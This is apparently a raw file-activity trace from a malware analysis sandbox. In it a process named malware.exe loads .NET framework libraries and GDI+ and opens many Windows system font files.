29/2/2020 - 1:46:0.481Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.481Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.481Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dllMicrosoft.VisualBasic.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.528Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.575Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.575Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:0.575Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.622Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.668Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.715Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:0.809Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.903Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:0.997Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.43Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:1.90Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:46:1.137Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.184Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.231Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.278Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.325Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.372Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.418Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.559Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:1.606Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.653Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:1.700Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.747Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.793Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.840Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.887Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.934Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:1.981Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:2.28Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:2.75Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:2.122Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:2.168Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:2.215Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:2.262Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:46:2.309Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:2.356Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:2.403Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:46:2.450Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dllSystem.Drawing.ni.dll
29/2/2020 - 1:46:2.497Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:2.543Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:2.590Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:2.637Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:2.684Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:2.731Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:2.778Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\Gdiplus.dll
29/2/2020 - 1:46:2.778Open1480C:\malware.exeC:\malware.exe.Local
29/2/2020 - 1:46:2.778Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23407_none_5c02a2f5a011f9be
29/2/2020 - 1:46:2.778Unknown1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23407_none_5c02a2f5a011f9be
29/2/2020 - 1:46:2.778Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23407_none_5c02a2f5a011f9be
29/2/2020 - 1:46:2.778Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23407_none_5c02a2f5a011f9be\GdiPlus.dll
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23407_none_5c02a2f5a011f9be\GdiPlus.dll
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\ShFolder.DLL
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Windows\SysWOW64\shfolder.dll
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Windows\SysWOW64\shfolder.dll
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Users\Behemot
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Users\Behemot
29/2/2020 - 1:46:2.825Unknown1480C:\malware.exeC:\Users\Behemot
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Users\Behemot\AppData\Local
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Users\Behemot\AppData\Local
29/2/2020 - 1:46:2.825Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\GDIPFONTCACHEV1.DAT
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Windows\SysWOW64\GDIPFONTCACHEV1.DAT
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Users\Behemot
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Users\Behemot
29/2/2020 - 1:46:2.825Unknown1480C:\malware.exeC:\Users\Behemot
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Users\Behemot\AppData\Local
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Users\Behemot\AppData\Local
29/2/2020 - 1:46:2.825Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\GDIPFONTCACHEV1.DAT
29/2/2020 - 1:46:2.825Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\GDIPFONTCACHEV1.DATGDIPFONTCACHEV1.DAT
29/2/2020 - 1:46:2.825Read1480C:\malware.exeC:\Users\Behemot\AppData\Local\GDIPFONTCACHEV1.DATGDIPFONTCACHEV1.DAT
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Windows\Fonts\marlett.ttf
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Windows\Fonts\marlett.ttf
29/2/2020 - 1:46:2.825Open1480C:\malware.exeC:\Windows\Fonts\marlett.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\marlett.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\arial.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\arial.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\arial.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\arial.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\ariali.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\ariali.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\ariali.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\ariali.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\arialbd.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\arialbd.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\arialbd.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\arialbd.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\arialbi.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\arialbi.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\arialbi.ttf
29/2/2020 - 1:46:2.840Open1480C:\malware.exeC:\Windows\Fonts\arialbi.ttf
29/2/2020 - 1:46:2.856Open1480C:\malware.exeC:\Windows\Fonts\batang.ttc
29/2/2020 - 1:46:2.856Open1480C:\malware.exeC:\Windows\Fonts\batang.ttc
29/2/2020 - 1:46:2.856Open1480C:\malware.exeC:\Windows\Fonts\batang.ttc
29/2/2020 - 1:46:2.856Open1480C:\malware.exeC:\Windows\Fonts\batang.ttc
29/2/2020 - 1:46:2.872Open1480C:\malware.exeC:\Windows\Fonts\batang.ttc
29/2/2020 - 1:46:2.934Open1480C:\malware.exeC:\Windows\Fonts\batang.ttc
29/2/2020 - 1:46:2.981Open1480C:\malware.exeC:\Windows\Fonts\batang.ttc
29/2/2020 - 1:46:2.981Open1480C:\malware.exeC:\Windows\Fonts\cour.ttf
29/2/2020 - 1:46:2.981Open1480C:\malware.exeC:\Windows\Fonts\cour.ttf
29/2/2020 - 1:46:2.981Open1480C:\malware.exeC:\Windows\Fonts\cour.ttf
29/2/2020 - 1:46:3.122Open1480C:\malware.exeC:\Windows\Fonts\cour.ttf
29/2/2020 - 1:46:3.168Open1480C:\malware.exeC:\Windows\Fonts\couri.ttf
29/2/2020 - 1:46:3.168Open1480C:\malware.exeC:\Windows\Fonts\couri.ttf
29/2/2020 - 1:46:3.168Open1480C:\malware.exeC:\Windows\Fonts\couri.ttf
29/2/2020 - 1:46:3.262Open1480C:\malware.exeC:\Windows\Fonts\couri.ttf
29/2/2020 - 1:46:3.309Open1480C:\malware.exeC:\Windows\Fonts\courbd.ttf
29/2/2020 - 1:46:29.278Open1480C:\malware.exeC:\Windows\Fonts\majalla.ttf
29/2/2020 - 1:46:29.278Open1480C:\malware.exeC:\Windows\Fonts\majalla.ttf
29/2/2020 - 1:46:29.278Open1480C:\malware.exeC:\Windows\Fonts\majalla.ttf
29/2/2020 - 1:46:29.418Open1480C:\malware.exeC:\Windows\Fonts\majalla.ttf
29/2/2020 - 1:46:29.559Open1480C:\malware.exeC:\Windows\Fonts\majallab.ttf
29/2/2020 - 1:46:29.559Open1480C:\malware.exeC:\Windows\Fonts\majallab.ttf
29/2/2020 - 1:46:29.559Open1480C:\malware.exeC:\Windows\Fonts\majallab.ttf
29/2/2020 - 1:46:29.700Open1480C:\malware.exeC:\Windows\Fonts\majallab.ttf
29/2/2020 - 1:46:29.840Open1480C:\malware.exeC:\Windows\Fonts\trado.ttf
29/2/2020 - 1:46:29.840Open1480C:\malware.exeC:\Windows\Fonts\trado.ttf
29/2/2020 - 1:46:29.840Open1480C:\malware.exeC:\Windows\Fonts\trado.ttf
29/2/2020 - 1:46:29.934Open1480C:\malware.exeC:\Windows\Fonts\trado.ttf
29/2/2020 - 1:46:29.934Open1480C:\malware.exeC:\Windows\Fonts\tradbdo.ttf
29/2/2020 - 1:46:29.934Open1480C:\malware.exeC:\Windows\Fonts\tradbdo.ttf
29/2/2020 - 1:46:29.934Open1480C:\malware.exeC:\Windows\Fonts\tradbdo.ttf
29/2/2020 - 1:46:30.28Open1480C:\malware.exeC:\Windows\Fonts\tradbdo.ttf
29/2/2020 - 1:46:30.28Open1480C:\malware.exeC:\Windows\Fonts\ahronbd.ttf
29/2/2020 - 1:46:30.28Open1480C:\malware.exeC:\Windows\Fonts\ahronbd.ttf
29/2/2020 - 1:46:30.28Open1480C:\malware.exeC:\Windows\Fonts\ahronbd.ttf
29/2/2020 - 1:46:30.122Open1480C:\malware.exeC:\Windows\Fonts\ahronbd.ttf
29/2/2020 - 1:46:30.122Open1480C:\malware.exeC:\Windows\Fonts\david.ttf
29/2/2020 - 1:46:30.122Open1480C:\malware.exeC:\Windows\Fonts\david.ttf
29/2/2020 - 1:46:30.122Open1480C:\malware.exeC:\Windows\Fonts\david.ttf
29/2/2020 - 1:46:30.215Open1480C:\malware.exeC:\Windows\Fonts\david.ttf
29/2/2020 - 1:46:30.215Open1480C:\malware.exeC:\Windows\Fonts\davidbd.ttf
29/2/2020 - 1:46:30.215Open1480C:\malware.exeC:\Windows\Fonts\davidbd.ttf
29/2/2020 - 1:46:30.215Open1480C:\malware.exeC:\Windows\Fonts\davidbd.ttf
29/2/2020 - 1:46:30.309Open1480C:\malware.exeC:\Windows\Fonts\davidbd.ttf
29/2/2020 - 1:46:30.309Open1480C:\malware.exeC:\Windows\Fonts\frank.ttf
29/2/2020 - 1:46:30.309Open1480C:\malware.exeC:\Windows\Fonts\frank.ttf
29/2/2020 - 1:46:30.309Open1480C:\malware.exeC:\Windows\Fonts\frank.ttf
29/2/2020 - 1:46:30.403Open1480C:\malware.exeC:\Windows\Fonts\frank.ttf
29/2/2020 - 1:46:30.403Open1480C:\malware.exeC:\Windows\Fonts\lvnm.ttf
29/2/2020 - 1:46:30.403Open1480C:\malware.exeC:\Windows\Fonts\lvnm.ttf
29/2/2020 - 1:46:30.403Open1480C:\malware.exeC:\Windows\Fonts\lvnm.ttf
29/2/2020 - 1:46:30.497Open1480C:\malware.exeC:\Windows\Fonts\lvnm.ttf
29/2/2020 - 1:46:30.497Open1480C:\malware.exeC:\Windows\Fonts\lvnmbd.ttf
29/2/2020 - 1:46:30.497Open1480C:\malware.exeC:\Windows\Fonts\lvnmbd.ttf
29/2/2020 - 1:46:30.497Open1480C:\malware.exeC:\Windows\Fonts\lvnmbd.ttf
29/2/2020 - 1:46:30.590Open1480C:\malware.exeC:\Windows\Fonts\lvnmbd.ttf
29/2/2020 - 1:46:30.590Open1480C:\malware.exeC:\Windows\Fonts\mriam.ttf
29/2/2020 - 1:46:30.590Open1480C:\malware.exeC:\Windows\Fonts\mriam.ttf
29/2/2020 - 1:46:30.590Open1480C:\malware.exeC:\Windows\Fonts\mriam.ttf
29/2/2020 - 1:46:30.684Open1480C:\malware.exeC:\Windows\Fonts\mriam.ttf
29/2/2020 - 1:46:30.684Open1480C:\malware.exeC:\Windows\Fonts\mriamc.ttf
29/2/2020 - 1:46:30.684Open1480C:\malware.exeC:\Windows\Fonts\mriamc.ttf
29/2/2020 - 1:46:30.684Open1480C:\malware.exeC:\Windows\Fonts\mriamc.ttf
29/2/2020 - 1:46:30.778Open1480C:\malware.exeC:\Windows\Fonts\mriamc.ttf
29/2/2020 - 1:46:30.778Open1480C:\malware.exeC:\Windows\Fonts\nrkis.ttf
29/2/2020 - 1:46:30.778Open1480C:\malware.exeC:\Windows\Fonts\nrkis.ttf
29/2/2020 - 1:46:30.778Open1480C:\malware.exeC:\Windows\Fonts\nrkis.ttf
29/2/2020 - 1:46:30.872Open1480C:\malware.exeC:\Windows\Fonts\nrkis.ttf
29/2/2020 - 1:46:30.872Open1480C:\malware.exeC:\Windows\Fonts\rod.ttf
29/2/2020 - 1:46:30.872Open1480C:\malware.exeC:\Windows\Fonts\rod.ttf
29/2/2020 - 1:46:30.872Open1480C:\malware.exeC:\Windows\Fonts\rod.ttf
29/2/2020 - 1:46:30.965Open1480C:\malware.exeC:\Windows\Fonts\rod.ttf
29/2/2020 - 1:46:30.965Open1480C:\malware.exeC:\Windows\Fonts\simfang.ttf
29/2/2020 - 1:46:30.965Open1480C:\malware.exeC:\Windows\Fonts\simfang.ttf
29/2/2020 - 1:46:30.965Open1480C:\malware.exeC:\Windows\Fonts\simfang.ttf
29/2/2020 - 1:46:31.247Open1480C:\malware.exeC:\Windows\Fonts\simfang.ttf
29/2/2020 - 1:46:31.340Open1480C:\malware.exeC:\Windows\Fonts\simhei.ttf
29/2/2020 - 1:46:31.340Open1480C:\malware.exeC:\Windows\Fonts\simhei.ttf
29/2/2020 - 1:46:31.340Open1480C:\malware.exeC:\Windows\Fonts\simhei.ttf
29/2/2020 - 1:46:31.622Open1480C:\malware.exeC:\Windows\Fonts\simhei.ttf
29/2/2020 - 1:46:31.762Open1480C:\malware.exeC:\Windows\Fonts\simkai.ttf
29/2/2020 - 1:46:31.762Open1480C:\malware.exeC:\Windows\Fonts\simkai.ttf
29/2/2020 - 1:46:31.762Open1480C:\malware.exeC:\Windows\Fonts\simkai.ttf
29/2/2020 - 1:46:32.43Open1480C:\malware.exeC:\Windows\Fonts\simkai.ttf
29/2/2020 - 1:46:32.137Open1480C:\malware.exeC:\Windows\Fonts\angsau.ttf
